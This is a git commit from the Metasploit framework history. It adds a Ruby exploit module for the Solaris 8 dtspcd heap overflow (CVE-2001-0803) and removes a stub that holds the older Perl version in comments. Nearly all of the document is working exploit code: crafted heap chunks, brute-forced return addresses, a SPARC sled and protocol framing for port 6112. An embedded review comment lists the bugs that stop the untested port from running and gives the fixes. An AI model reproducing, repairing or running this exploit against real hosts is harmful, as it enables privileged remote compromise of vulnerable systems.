Moved. Changed. Woop. Not tested

git-svn-id: file:///home/svn/incoming/trunk@3261 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-12-27 05:47:03 +00:00
parent 7e14163849
commit 87f23247a5
2 changed files with 140 additions and 265 deletions


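--- /dev/null
+++ b/PATH-UNKNOWN-1
@@ -0,0 +1,140 @@
+require 'msf/core'
+module Msf
+class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
+include Exploit::Remote::Tcp
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Solaris dtspcd Heap Overflow',
+'Description' => %q{
+This is a port of noir's dtspcd exploit. This module should
+work against any vulnerable version of Solaris 8 (sparc).
+The original exploit code was published in the book
+Shellcoder's Handbook.
+},
+'Author' => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
+'Version' => '$Revision$',
+'References' =>
+[
+[ 'OSVDB', '4503'],
+[ 'CVE', '2001-0803'],
+[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
+[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
+[ 'MIL', '61'],
+],
+'Privileged' => true,
+'Payload' =>
+{
+'Space' => 800,
+'BadChars' => "\x00\x0d",
+'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
+},
+'Platform' => 'solaris',
+'Arch' => ARCH_SPARC,
+'Targets' =>
+[
+['Solaris 8',
+{ 'Rets' =>
+[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
+}
+],
+],
+'DisclosureDate' => 'Jul 10 2002',
+'DefaultTarget' => 0))
+register_options(
+[
+Opt::RPORT(6112)
+], self.class)
+end
+def exploit
+return if not dtspcd_uname()
+target['Rets'][4].each do |tjmp|
+rbase = target['Rets'][1]
+while (rbase < target['Rets'][2]) do
+print_status("Trying 0x%.8x 0x%.8x" % target['Rets'][0] + tjmp, rbase)
+attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
+attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
+rbase += target['Rets'][3]
+end
+end
+handler
+disconnect
+end
+def check
+return Exploit::CheckCode::Detected if dtspcd_uname()
+return Exploit::CheckCode::Safe
+end
+def dtspcd_uname
+spc_connect()
+spc_write(spc_register('root', "\x00"), 4)
+host, os, ver, arch = spc_read().gsub("\x00", '').split(':')
+return false if not host
+print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
+spc_write("", 2)
+return true
+end
+def chunk_create(retloc, retadd)
+"\x12\x12\x12\x12" +
+[retaddr].pack('N')+
+"\x23\x23\x23\x23\xff\xff\xff\xff" +
+"\x34\x34\x34\x34\x45\x45\x45\x45" +
+"\x56\x56\x56\x56" +
+[retloc - 8].pack('N')
+end
+def attack(retloc, retadd, fcode)
+spc_connect()
+buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff" * ((4096 - 8 - fcode.length) / 8)) + fcode
+buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
+buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
+buf << "\x00\x00\x0f\xf4"
+buf << chunk_create(retloc, retadd)
+buf << "X" * ((0x103e - 8) - buf.length)
+spc_write(spc_register("", buf), 4)
+sock.get_once(-1)
+end
+def spc_register(user='', buff='')
+"4 \x00#{user}\x00\x0010\x00#{buff}"
+end
+def spc_write(buff = '', cmd='')
+sock.put(sprintf("%08x%02x%04x%04x %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
+end
+def spc_read
+# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
+head = sock.get_once(20)
+sock.get_once( head[10, 13].hex ) || ''
+end
+def spc_connect
+disconnect
+connect
+@spc_seq = 0
+end
+end
+end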
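Review bot: `chunk_create` references `retaddr` on the `[retaddr].pack('N')+` line while its parameter is named `retadd`, so the first call from `attack` raises NameError; change it to `[retadd].pack('N') +`. Two other lines in the same section fail before any request is built: in `exploit` the format arguments must be grouped, `print_status("Trying 0x%.8x 0x%.8x" % [target['Rets'][0] + tjmp, rbase])`, because `%` binds tighter than `+` and `rbase` currently arrives as a stray second argument to `print_status`; and in `spc_read` the slice `head[10, 13]` takes 13 characters rather than the 4-character length field its own comment describes, so it should read `head[10, 4].hex`, matching the removed Perl `substr($buff, 10, 4)`. `spc_read` also calls `.hex` on `head` without checking that `sock.get_once(20)` returned anything, so a silent peer becomes a NoMethodError instead of the `false` path `dtspcd_uname` and `check` rely on; a `return '' unless head` guard after the read keeps `check` reporting Safe. The commit message says the port is untested, which is consistent with these being carried over from a line-by-line translation.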


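--- a/PATH-UNKNOWN-2
+++ /dev/null
@@ -1,265 +0,0 @@
-require 'msf/core'
-module Msf
-class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
-include Exploit::Remote::Tcp
-def initialize(info = {})
-super(update_info(info,
-'Name' => 'Solaris dtspcd Heap Overflow',
-'Description' => %q{
-This is a port of noir's dtspcd exploit. This module should
-work against any vulnerable version of Solaris 8 (sparc).
-The original exploit code was published in the book
-Shellcoder's Handbook.
-},
-'Author' => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
-'Version' => '$Revision$',
-'References' =>
-[
-[ 'OSVDB', '4503'],
-[ 'CVE', '2001-0803'],
-[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
-[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
-[ 'MIL', '61'],
-],
-'Privileged' => true,
-'Payload' =>
-{
-'Space' => 800,
-'BadChars' => "\x00\x0d",
-'PrependEncoder' => "\xa4\x1c\x40\x11\xa4\x1c\x40\x11\xa4\x1c\x40\x11",
-},
-'Targets' =>
-[
-[
-'Automatic Targetting',
-{
-'Platform' => 'solaris',
-'Ret' => 0x0,
-},
-],
-],
-'DisclosureDate' => 'Jul 10 2002',
-'DefaultTarget' => 0))
-end
-def exploit
-connect
-handler
-disconnect
-end
-=begin
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-package Msf::Exploit::solaris_dtspcd_noir;
-use base "Msf::Exploit";
-use IO::Socket;
-use IO::Select;
-use strict;
-use Pex::Text;
-my $advanced = { };
-my $info =
-{
-'Name' => 'Solaris dtspcd Heap Overflow',
-'Version' => '$Revision$',
-'Authors' =>
-[
-'noir <noir [at] uberhax0r.net>',
-'H D Moore <hdm [at] metasploit.com>'
-],
-'Arch' => [ 'sparc' ],
-'OS' => [ 'solaris' ],
-'Priv' => 1,
-'UserOpts' =>
-{
-'RHOST' => [1, 'ADDR', 'The target address'],
-'RPORT' => [1, 'PORT', 'The dtogin service port', 6112],
-},
-'Payload' =>
-{
-'Space' => 800,
-'BadChars' => "\x00\x0d",
-'PrependEncoder' => (pack('N', 0xa41c4011) x 3),
-},
-'Description' => Pex::Text::Freeform(qq{
-This is a port of noir's dtspcd exploit. This module should work against
-any vulnerable version of Solaris 8 (sparc). The original exploit code
-was published in the book Shellcoder's Handbook.
-}),
-'Refs' =>
-[
-['OSVDB', '4503'],
-['CVE', '2001-0803'],
-['URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
-['URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],
-['MIL', '61'],
-],
-'Targets' =>
-[
-['Solaris8', 0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ],
-],
-'Keys' => ['dtspcd'],
-'DisclosureDate' => 'Jul 10 2002',
-};
-sub new {
-my $class = shift;
-my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-return($self);
-}
-sub Check {
-my $self = shift;
-my $target_host = $self->GetVar('RHOST');
-my $target_port = $self->GetVar('RPORT');
-if(! $self->get_uname) {
-$self->PrintLine("[*] No response from the dtlogin service");
-return $self->CheckCode('Safe');
-}
-# XXX - probe service for crash
-return $self->CheckCode('Detected');
-}
-sub Exploit {
-my $self = shift;
-my $target_host = $self->GetVar('RHOST');
-my $target_port = $self->GetVar('RPORT');
-my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-my $target_idx = $self->GetVar('TARGET');
-my $target = $self->Targets->[ $target_idx ];
-if(! $self->get_uname) {
-$self->PrintLine("[*] No response from the dtlogin service");
-return;
-}
-my ($res, $req);
-for my $tjmp ( @{ $target->[5] } ) {
-for (my $rbase = $target->[2]; $rbase < $target->[3]; $rbase += $target->[4] ) {
-$self->PrintLine("[*] Trying ".sprintf("0x%.8x 0x%.8x", $target->[1] + $tjmp, $rbase));
-return if ! $self->attack($target->[1] + $tjmp, $rbase, $shellcode);
-return if ! $self->attack($target->[1] + $tjmp, $rbase + 4, $shellcode);
-}
-}
-}
-sub spc_setup {
-my $self = shift;
-my $s = Msf::Socket::Tcp->new
-(
-'PeerAddr' => $self->GetVar('RHOST'),
-'PeerPort' => $self->GetVar('RPORT'),
-'LocalPort' => $self->GetVar('CPORT'),
-'SSL' => $self->GetVar('SSL'),
-);
-if ($s->IsError) {
-$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
-return;
-}
-$self->{'SOC'} = $s;
-return $s;
-}
-sub spc_register {
-my ($self, $user, $buff) = @_;
-return "4 "."\x00".$user."\x00\x00"."10"."\x00".$buff;
-}
-sub spc_write {
-my ($self, $buff, $cmd) = @_;
-my $req = sprintf("%08x%02x%04x%04x %s", 2, $cmd, length($buff), ++$self->{'SEQ'}, $buff);
-return if ! $self->{'SOC'};
-return $self->{'SOC'}->Send($req);
-}
-sub spc_read {
-my $self = shift;
-return if ! $self->{'SOC'};
-my $buff = $self->{'SOC'}->Recv(20, 5);
-my $chan = hex(substr($buff, 0, 9));
-my $cmd = hex(substr($buff, 9, 1));
-my $mbl = hex(substr($buff, 10, 4));
-my $seq = hex(substr($buff, 14, 4));
-$buff = $self->{'SOC'}->Recv($mbl, 5);
-return $buff;
-}
-sub get_uname {
-my $self = shift;
-return if ! $self->spc_setup;
-$self->spc_write($self->spc_register('root', "\x00"), 4);
-my $buff = $self->spc_read;
-$buff =~ s/\x00//g;
-my ($host, $os, $ver, $arch) = split(/:/, $buff);
-return if ! $host;
-$self->PrintLine("[*] Detected dtspcd running $os v$ver on $arch hardware");
-$self->spc_write("", 2);
-}
-sub get_chunk {
-my ($self, $retloc, $retadd) = @_;
-return
-"\x12\x12\x12\x12" . pack('N', $retadd).
-"\x23\x23\x23\x23\xff\xff\xff\xff".
-"\x34\x34\x34\x34\x45\x45\x45\x45".
-"\x56\x56\x56\x56" . pack('N', $retloc - 8);
-}
-sub attack {
-my ($self, $retloc, $retadd, $fcode) = @_;
-return if ! $self->spc_setup;
-my $req = "\xa4\x1c\x40\x11\x20\xbf\xff\xff" x ((4096 - 8 - length($fcode)) / 8);
-$req .= $fcode .
-"\x00\x00\x10\x3e\x00\x00\x00\x14".
-"\x12\x12\x12\x12\xff\xff\xff\xff".
-"\x00\x00\x0f\xf4".
-$self->get_chunk($retloc, $retadd);
-$req .= "A" x ((0x103e - 8) - length($req));
-$self->spc_write($self->spc_register("", $req), 4);
-my $res = $self->{'SOC'}->Recv(-1, 5);
-return 1;
-}
-1;
-=end
-end
-end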